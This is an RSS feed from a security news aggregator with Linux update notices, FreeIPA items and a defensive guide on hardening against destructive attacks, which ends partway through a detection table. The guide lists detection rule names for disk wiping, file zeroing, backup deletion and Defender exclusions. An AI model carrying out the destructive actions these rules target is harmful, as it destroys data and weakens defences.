<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=onlinetraining+domaincontroller+linuxumgebungen+freeipa%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Mon, 27 Jul 2026 21:53:05 +0200</lastBuildDate>
<pubDate>Mon, 27 Jul 2026 21:53:05 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=onlinetraining+domaincontroller+linuxumgebungen+freeipa%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=onlinetraining+domaincontroller+linuxumgebungen+freeipa%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (kernel), Debian (dovecot, exim4, frr, and haveged), Fedora (cockpit, freeipa, jpegxl, libre, nextcloud, perl-Cpanel-JSON-XS, perl-Crypt-Argon2, perl-Dist-Build, perl-ExtUtils-Builder, perl-ExtUtils-Builder-Compiler, perl-HTTP-Tiny, perl-libwww-perl,...]]></description>
<link>https://tsecurity.de/de/3575456/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3575456/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 05 Jun 2026 15:10:00 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (kernel), <b>Debian</b> (dovecot, exim4, frr, and haveged), <b>Fedora</b> (cockpit, freeipa, jpegxl, libre, nextcloud, perl-Cpanel-JSON-XS, perl-Crypt-Argon2, perl-Dist-Build, perl-ExtUtils-Builder, perl-ExtUtils-Builder-Compiler, perl-HTTP-Tiny, perl-libwww-perl, python-starlette, rubygem-yard, rust-sequoia-cert-store, rust-sequoia-chameleon-gnupg, rust-sequoia-octopus-librnp, rust-sequoia-sop, rust-sequoia-sq, rust-sequoia-wot, samba, and transmission), <b>Red Hat</b> (image-builder), <b>Slackware</b> (dnsmasq and libinput), <b>SUSE</b> (evince, glibc, google-guest-agent, hplip, ignition, LibVNCServer, libzypp, libsolv, python-Pillow, salt, thunderbird, and vim), and <b>Ubuntu</b> (apache2, linux, linux-aws, linux-aws-5.15, linux-aws-fips, linux-fips, linux-gcp,
 linux-gcp-5.15, linux-gcp-fips, linux-gke, linux-gkeop, linux-hwe-5.15,
 linux-ibm, linux-ibm-5.15, linux-intel-iot-realtime, linux-intel-iotg,
 linux-kvm, linux-nvidia, linux-nvidia-tegra, linux-nvidia-tegra-5.15,
 linux-nvidia-tegra-igx, linux-oracle, linux-raspi, linux-realtime, linux, linux-aws, linux-aws-fips, linux-azure, linux-azure-5.4,
 linux-azure-fips, linux-bluefield, linux-fips, linux-gcp, linux-gcp-5.4,
 linux-gcp-fips, linux-iot, linux-kvm, linux-oracle, linux-oracle-5.4,
 linux-xilinx-zynqmp, linux, linux-azure, linux-azure-4.15, linux-azure-fips, linux-fips,
 linux-gcp-4.15, linux-gcp-fips, linux-kvm, linux-oracle, linux-aws-5.4, linux-hwe-5.4, linux-azure-fips, linux-fips, linux-raspi, linux-raspi-5.4, nano, postfix, robocode, tomcat6, tomcat7, and yard).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in freeipa (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3574409/unix-server/security-mehrere-probleme-in-freeipa-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3574409/unix-server/security-mehrere-probleme-in-freeipa-fedora/</guid>
<pubDate>Fri, 05 Jun 2026 07:01:15 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Mehrere Probleme in freeipa (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3566661/it-security-nachrichten/mehrere-probleme-in-freeipa-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3566661/it-security-nachrichten/mehrere-probleme-in-freeipa-fedora/</guid>
<pubDate>Tue, 02 Jun 2026 17:23:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Security updates for Tuesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (php:8.2 and php:8.3), Debian (gst-plugins-good1.0, symfony, and yelp), Fedora (dovecot, freeipa, hplip, libpng, perl-Catalyst-Plugin-Authentication, postfix, samba, unbound, and vim), Mageia (assimp, libcaca, sdl2_sound, and tar), Slackware (kernel)...]]></description>
<link>https://tsecurity.de/de/3566223/linux-tipps/security-updates-for-tuesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3566223/linux-tipps/security-updates-for-tuesday/</guid>
<pubDate>Tue, 02 Jun 2026 15:10:00 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (php:8.2 and php:8.3), <b>Debian</b> (gst-plugins-good1.0, symfony, and yelp), <b>Fedora</b> (dovecot, freeipa, hplip, libpng, perl-Catalyst-Plugin-Authentication, postfix, samba, unbound, and vim), <b>Mageia</b> (assimp, libcaca, sdl2_sound, and tar), <b>Slackware</b> (kernel), <b>SUSE</b> (alloy, apache-commons-lang3, apache-commons-text,, apache2, bubblewrap, busybox, chromium, cups, docker-stable, ffmpeg-8, google-osconfig-agent, gsasl, ignition, java-26-openjdk, kernel, libsolv-demo, libsoup, libzypp, localsearch, openjpeg2, postgresql-jdbc, putty, python-mistune, python-Pillow, python-python-multipart, python-Twisted, python3-Twisted, re, roundcubemail, vim, wireshark, and xz), and <b>Ubuntu</b> (evolution-data-server, exim4, gsasl, haveged, lcms2, libreoffice, linux-aws, linux-lts-xenial, linux-lowlatency, linux-nvidia-tegra, nginx, nncp, qtdeclarative-opensource-src, sslh, sssd, and xz-utils).]]></content:encoded>
</item>
<item>
<title><![CDATA[Identity-Management mit FreeIPA]]></title>
<description><![CDATA[Identity-Management mit FreeIPA

      
      
        
          
            
                



            
          
        
              
    
  Thorsten Scherf
Mo., 11.05.2026 - 07:00


            Möchten Sie Ihre Identitäts-, Richtlinien- und Authentifizierungssysteme effizient und m...]]></description>
<link>https://tsecurity.de/de/3505971/server/identity-management-mit-freeipa/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3505971/server/identity-management-mit-freeipa/</guid>
<pubDate>Mon, 11 May 2026 08:30:43 +0200</pubDate>
<category>🐧 Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<span class="field field--name-title field--type-string field--label-hidden">Identity-Management mit FreeIPA</span>

      <div class="field field--name-field-image field--type-image field--label-hidden field__items">
      <div class="images-container clearfix">
        <div class="image-preview clearfix">
          <div class="image-wrapper clearfix">
            <div class="field__item">
                <a class="image-popup overlayed" href="https://www.it-administrator.de/open-source-tipp-identity-management-mit-freeipa"><img loading="lazy" src="https://www.it-administrator.de/sites/default/files/styles/medium/public/ITA_1125_P13_00.jpg?itok=bpTHRRUI" width="480" height="319" alt="Eine Frau mit weißer Maske steht nachts vor einem angestrahlten Gebäude als Symbol für Anonymität." title="Who is Who: Identity-Management mit FreeIPA. (Quelle: dengrin - 123RF)" typeof="foaf:Image" class="image-style-medium">

<span class="overlay"><i class="fa fa-plus"></i></span></a>

            </div>
          </div>
        </div>
              </div>
    </div>
  <span class="field field--name-uid field--type-entity-reference field--label-hidden"><a title="Benutzerprofil anzeigen." href="https://www.it-administrator.de/user/125" lang about="https://www.it-administrator.de/user/125" typeof="schema:Person" property="schema:name" datatype class="username">Thorsten Scherf</a></span>
<span class="field field--name-created field--type-created field--label-hidden"><time datetime="2026-05-11T07:00:00+02:00" title="Montag, Mai 11, 2026 - 07:00" class="datetime">Mo., 11.05.2026 - 07:00</time>
</span>

            <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item">Möchten Sie Ihre Identitäts-, Richtlinien- und Authentifizierungssysteme effizient und mit minimalem Aufwand verwalten? Dann sollten Sie sich Ansible-FreeIPA ansehen. Die Ansible- Collection stellt Module, Rollen und Playbooks zur Verfügung, um damit sowohl neue als auch bestehende FreeIPA-basierte Identity-Management-Systeme zu installieren, zu konfigurieren und zu verwalten. Der Open-Source-Tipp in diesem Monat stellt die Software vor und zeigt, wie Sie sich ganz einfach auch mit Ihrem GitHub-Konto an einem Linux-System anmelden.</div>
      <div class="field field--name-field-mt-post-categories field--type-entity-reference field--label-hidden field--entity-reference-target-type-taxonomy-term clearfix">
    <ul class="links field__items">
          <li><a href="https://www.it-administrator.de/fachartikel" hreflang="en">Fachartikel</a></li>
      </ul>
</div>  <div class="node__links">
    <ul class="links inline"><li class="node-readmore"><a href="https://www.it-administrator.de/open-source-tipp-identity-management-mit-freeipa" rel="tag" title="Identity-Management mit FreeIPA" hreflang="en">Weiterlesen<span class="visually-hidden"> über Identity-Management mit FreeIPA</span></a></li></ul>  </div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Proactive Preparation and Hardening Against Destructive Attacks: 2026 Edition]]></title>
<description><![CDATA[Written by: Matthew McWhirt, Bhavesh Dhake, Emilio Oropeza, Gautam Krishnan, Stuart Carrera, Greg Blaum, Michael Rudden

UPDATE (March 13): Added guidance around abuse or misuse of endpoint / MDM platforms.
Background
Threat actors leverage destructive malware to destroy data, eliminate evidence ...]]></description>
<link>https://tsecurity.de/de/3501421/it-security-nachrichten/proactive-preparation-and-hardening-against-destructive-attacks-2026-edition/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501421/it-security-nachrichten/proactive-preparation-and-hardening-against-destructive-attacks-2026-edition/</guid>
<pubDate>Fri, 08 May 2026 23:19:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: Matthew McWhirt, Bhavesh Dhake, Emilio Oropeza, Gautam Krishnan, Stuart Carrera, Greg Blaum, Michael Rudden</p>
<hr></div>
<div class="block-paragraph_advanced"><p><em>UPDATE (March 13): <span>Added guidance around abuse or misuse of endpoint / MDM platforms</span>.</em></p>
<h3><span>Background</span></h3>
<p><span>Threat actors leverage destructive malware to destroy data, eliminate evidence of malicious activity, or manipulate systems in a way that renders them inoperable. Destructive cyberattacks can be a powerful means to achieve strategic or tactical objectives; however, the risk of reprisal is likely to limit the frequency of use to very select incidents. Destructive cyberattacks can include destructive malware, wipers, or modified ransomware.</span></p>
<p><span><span>When conflict erupts, cyber attacks are an inexpensive and easily deployable weapon. It should come as no surprise that instability leads to increases in attacks. </span>This blog post provides proactive recommendations for organizations to prioritize for protecting against a destructive attack within an environment. The recommendations include practical and scalable methods that can help protect organizations from not only destructive attacks, but potential incidents where a threat actor is attempting to perform reconnaissance, escalate privileges, laterally move, maintain access, and achieve their mission. </span></p>
<p><span>The detection opportunities outlined in this blog post are meant to act as supplementary monitoring to existing security tools. Organizations should leverage endpoint and network security tools as additional preventative and detective measures. These tools use a broad spectrum of detective capabilities, including signatures and heuristics, to detect malicious activity with a reasonable degree of fidelity. The custom detection opportunities referenced in this blog post are correlated to specific threat actor behavior and are meant to trigger anomalous activity that is identified by its divergence from normal patterns. Effective monitoring is dependent on a thorough understanding of an organization's unique environment and usage of pre-established baselines.</span></p>
<h3><span>Organizational Resilience</span></h3>
<p><span>While the core focus of this blog post is aligned to technical- and tactical-focused security controls, technical preparation and recovery are not the </span><span>only</span><span> strategies. Organizations that include crisis preparation and orchestration as key components of security governance can naturally adopt a "living" resilience posture. This includes:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Out-of-Band Incident Command and Communication</strong><span>: Establish a pre-validated, "out-of-band" communication platform that is completely decoupled from the corporate identity plane. This ensures that the key stakeholders and third-party support teams can coordinate and communicate securely, even if the primary communication platform is unavailable.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Defined Operational Contingency and Recovery Plans: </strong><span>Establish baseline operational requirements, including manual procedures for vital business functions to ensure continuity during restoration or rebuild efforts. Organizations must also develop prioritized application recovery sequences and map the essential dependencies needed to establish a secure foundation for recovery goals.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Pre-Establish Trusted Third-Party Vendor Relationships: </strong><span>Based on the range of technologies and platforms vital to business operations, develop predefined agreements with external partners to ensure access to specialists for legal / contractual requirements, incident response, remediation, recovery, and ransomware negotiations.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Practice and Refine the Recovery: </strong><span>Conduct exercises that validate the end-to-end restoration of mission-critical services using isolated, immutable backups and out-of-band communication channels, ensuring that recovery timelines (RTO) and data integrity (RPO) are tested, practiced, and current. </span></p>
</li>
</ul>
<h3><span>Google Security Operations</span></h3>
<p><a href="https://cloud.google.com/security/products/security-operations"><span>Google Security Operations</span></a><span> (SecOps) customers have access to these broad category rules and more under the Mandiant Intel Emerging Threats, Mandiant Frontline Threats, Mandiant Hunting Rules, CDIR SCC Enhanced Data Destruction Alerts rule packs. The activity discussed in the blog post is detected in Google SecOps under the rule names:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>BABYWIPER File Erasure</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Secure Evidence Destruction And Cleanup Commands</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>CMD Launching Application Self Delete</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Copy Binary From Downloads</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Rundll32 Execution Of Dll Function Name Containing Special Character</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Services Launching Cmd</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>System Process Execution Via Scheduled Task</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Dllhost Masquerading</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Backdoor Writing Dll To Disk For Injection</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Multiple Exclusions Added To Windows Defender In Single Command</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Path Exclusion Added to Windows Defender</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Registry Change to CurrentControlSet Services</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Powershell Set Content Value Of 0</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Overwrite Disk Using DD Utility</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Bcdedit Modifications Via Command</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Disabling Crash Dump For Drive Wiping</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Suspicious Wbadmin Commands</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Fsutil File Zero Out</span></p>
</li>
</ul></div>
<div class="block-paragraph_advanced"><h3><span>Recommendations Summary</span></h3>
<p><span>Table 1 provides a high-level overview of guidance in this blog post.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Focus Area</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><a href="https://cloud.google.com/blog/topics/threat-intelligence/preparation-hardening-destructive-attacks#:~:text=1.%20External-Facing%20Assets"><span>External-Facing Assets</span></a></p>
</td>
<td>
<p><span>Protect against the risk of threat actors exploiting an externally facing vector or leveraging existing technology for unauthorized remote access.</span></p>
</td>
</tr>
<tr>
<td>
<p><a href="https://cloud.google.com/blog/topics/threat-intelligence/preparation-hardening-destructive-attacks#:~:text=2.%20Critical%20Asset%20Protections"><span>Critical Asset Protections</span></a></p>
</td>
<td>
<p><span>Protect specific high-value infrastructure and prepare for recovery from a destructive attack.</span></p>
</td>
</tr>
<tr>
<td>
<p><a href="https://cloud.google.com/blog/topics/threat-intelligence/preparation-hardening-destructive-attacks#:~:text=3.%20On-Premises%20Lateral%20Movement%20Protections"><span>On-Premises Lateral Movement Protections</span></a></p>
</td>
<td>
<p><span>Protect against a threat actor with initial access into an environment from moving laterally to further expand their scope of access and persistence.</span></p>
</td>
</tr>
<tr>
<td>
<p><a href="https://cloud.google.com/blog/topics/threat-intelligence/preparation-hardening-destructive-attacks#:~:text=4.%20Credential%20Exposure%20and%20Account%20Protections"><span>Credential Exposure and Account Protections</span></a></p>
</td>
<td>
<p><span>Protect against the exposure of privileged credentials to facilitate privilege escalation.</span></p>
</td>
</tr>
<tr>
<td>
<p><a href="https://cloud.google.com/blog/topics/threat-intelligence/preparation-hardening-destructive-attacks#:~:text=5.%20Preventing%20Destructive%20Actions%20in%20Kubernetes%20and%20CI%2FCD%20Pipelines"><span>Preventing Destructive Actions in Kubernetes and CI/CD Pipelines</span></a></p>
</td>
<td>
<p><span>Protect the integrity and availability of Kubernetes environments and CI/CD pipelines.</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div align="left"><span><span>Table 1: </span><span>Overview of recommendations</span></span></div></div>
<div class="block-paragraph_advanced"><h3><span>1. External-Facing Assets</span></h3>
<h4><span>Identify, Enumerate, and Harden</span></h4>
<p><span>To protect against a threat actor exploiting vulnerabilities or misconfigurations via an external-facing vector, organizations must determine the scope of applications and organization-managed services that are externally accessible. Externally accessible applications and services (including both on-premises and cloud) are often targeted by threat actors for initial access by exploiting known vulnerabilities, brute-forcing common or default credentials, or authenticating using valid credentials. </span></p>
<p><span>To proactively identify and validate external-facing applications and services, consider:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Leveraging a </span><span>vulnerability scanning technology to identify assets and associated vulnerabilities. </span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Performing a focused vulnerability assessment or penetration test with the goal of identifying external-facing vectors that could be leveraged for authentication and access.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Verifying with technology vendors if the products leveraged by an organization for external-facing services require patches or updates to mitigate known vulnerabilities. </span></p>
</li>
</ul>
<p><span>Any identified vulnerabilities should not only be patched and hardened, but the identified technology platforms should also be reviewed to ensure that evidence of suspicious activity or technology/device modifications have not already occurred.</span></p>
<p><span>The following table provides an overview of capabilities to proactively review and identify external-facing assets and resources within common cloud-based infrastructures.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Cloud Provider</strong></p>
</td>
<td>
<p><strong>Attack Surface Discovery Capability</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>Google Cloud</span></p>
</td>
<td>
<p><a href="https://cloud.google.com/security/products/security-command-center"><span>Security Command Center</span></a></p>
</td>
</tr>
<tr>
<td>
<p><span>Amazon Web Services</span></p>
</td>
<td>
<p><a href="https://docs.aws.amazon.com/inspector/latest/user/what-is-inspector.html" rel="noopener" target="_blank"><span>AWS Config / Inspector</span></a></p>
</td>
</tr>
<tr>
<td>
<p><span>Microsoft Azure</span></p>
</td>
<td>
<p><a href="https://learn.microsoft.com/en-us/azure/external-attack-surface-management/" rel="noopener" target="_blank"><span>Defender External Attack Surface Management (Defender EASM</span></a><span>)</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div align="left"><span><span>Table 2: Overview of cloud provider attack surface discovery capabilities</span></span></div></div>
<div class="block-paragraph_advanced"><h4><span>Enforce Multi-Factor Authentication</span></h4>
<p><span>External-facing assets that leverage single-factor authentication (SFA) are highly susceptible to brute-forcing attacks, password spraying, or unauthorized remote access using valid (stolen) credentials. External-facing applications and services that currently allow for SFA should be configured to support multi-factor authentication (MFA). Additionally, MFA should be leveraged for accessing not only on-premises external-facing managed infrastructure, but also for cloud-based resources (e.g., software-as-a-service [SaaS] such as Microsoft 365 [M365]). </span></p>
<p><span>When configuring multifactor authentication, the following methods are commonly considered (and ranked from most to least secure):</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Fast IDentity Online 2 (FIDO2)/WebAuthn security keys or passkeys</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Software/hardware Open Authentication (OAUTH) token</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Authenticator application (e.g., Duo/Microsoft [MS] Authenticator/Okta Verify)</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>Time-based One Time Password (TOTP)</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>Push notification (least preferred option) using number matching when possible</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Phone call</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Short Message Service (SMS) verification</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Email-based verification</span></p>
</li>
</ul>
<h4><span>Risks of Specific MFA Methods</span></h4>
<h5><span>Push Notifications</span></h5>
<p><span>If an organization is leveraging push notifications for MFA (e.g., a notification that requires acceptance via an application or automated call to a mobile device), threat actors can exploit this type of MFA configuration for attempted access, as a user may inadvertently accept a push notification on their device without the context of where the authentication was initiated. </span></p>
<h5><span>Phone/SMS Verification</span></h5>
<p><span>If an organization is leveraging phone calls or SMS-based verification for MFA, these methods are not encrypted and are susceptible to potentially being intercepted by a threat actor. These methods are also vulnerable if a threat actor is able to transfer an employee's phone number to an attacker-controlled subscriber identification module (SIM) card. This would result in the MFA notifications being routed to the threat actor instead of the intended employee. </span></p>
<h5><span>Email-Based Verification</span></h5>
<p><span>If an organization is leveraging email-based verification for validating access or for retrieving MFA codes, and a threat actor has already established the ability to access the email of their target, the actor could potentially also retrieve the email(s) to validate and complete the MFA process. </span></p>
<p><span>If any of these MFA methods are leveraged, consider:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Training remote users to never accept or respond to a logon notification when they are not actively attempting to log in.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Establishing a method for users to report suspicious MFA notifications, as this could be indicative of a compromised account.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Ensuring there are messaging policies in place to prevent the auto-forwarding of email messages outside the organization.</span></p>
</li>
</ul>
<h5><span>Time-Based One-Time Password</span></h5>
<p><span>Time-based one-time password (TOTP) relies on a shared secret, called a seed, known by both the authenticating system and the authenticator possessed by an end user. If a seed is compromised, the TOTP authenticator can be duplicated and used by a threat actor.</span></p>
<h4><span><span>Detection Opportunities for External-Facing Assets and MFA Attempts</span></span></h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Use Case</strong></p>
</td>
<td>
<p><strong>MITRE ID</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>Brute Force</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1110/" rel="noopener" target="_blank"><span>T1110 – Brute Force</span></a></p>
</td>
<td>
<p><span>Search for a single user with an excessive number of failed logins from external Internet Protocol (IP) addresses. </span></p>
<p><span>This risk can be mitigated by enforcing a strong password, MFA, and lockout policy.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Password Spray</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1110/003/" rel="noopener" target="_blank"><span>T1110.003 – Password Spray</span></a></p>
</td>
<td>
<p><span>Search for a high number of accounts with failed logins, typically from the similar origination addresses.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Multiple Failed MFA Same User</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1110/" rel="noopener" target="_blank"><span>T1110 – Brute Force</span></a></p>
<p><a href="https://attack.mitre.org/techniques/T1078/" rel="noopener" target="_blank"><span>T1078 – Valid Accounts</span></a></p>
</td>
<td>
<p><span>Search for multiple failed MFA conditions for the same account. This may be indicative of a previously compromised credential.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Multiple Failed MFA Same Source</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1110/003/" rel="noopener" target="_blank"><span>T1110.003 – Password Spray</span></a></p>
<p><a href="https://attack.mitre.org/techniques/T1078/" rel="noopener" target="_blank"><span>T1078 – Valid Accounts</span></a></p>
</td>
<td>
<p><span>Search for multiple failed MFA prompts for different users from the same source. This may be indicative of multiple compromised credentials and an attempt to "spray" MFA prompts/tokens for access.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>External Authentication from an Account with Elevated Privileges</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1078/" rel="noopener" target="_blank"><span>T1078 – Valid Accounts</span></a></p>
</td>
<td>
<p><span>Privileged accounts should use internally managed and secured privileged access workstations for access and should not be accessible directly from an external (untrusted) source.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Adversary in the Middle (AiTM) Session Token Theft</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1557/" rel="noopener" target="_blank"><span>T1557 - Adversary in the Middle</span></a></p>
</td>
<td>
<p><span>Monitor for sign-ins where the authentication method succeeds but the session originates from an IP/ASN inconsistent with the user's prior sessions. </span></p>
<p><span>Detect logins from newly registered domains or known reverse-proxy infrastructure (EvilProxy, Tycoon 2FA). </span></p>
<p><span>Correlate sign-in logs for "isInteractive: true" sessions with anomalous user-agent strings or geographically impossible travel.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>MFA Fatigue / Prompt Bombing</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1621/" rel="noopener" target="_blank"><span>T1621 - MFA Request Generation</span></a></p>
</td>
<td>
<p><span>Search for accounts receiving more than five MFA push notifications within a 10-minute window without a corresponding successful authentication. </span></p>
</td>
</tr>
<tr>
<td>
<p><span>Post-Authentication MFA Device Registration</span></p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1098/005/" rel="noopener" target="_blank"><span>T1098.005 - Account Manipulation - Device Registration</span></a></p>
</td>
<td>
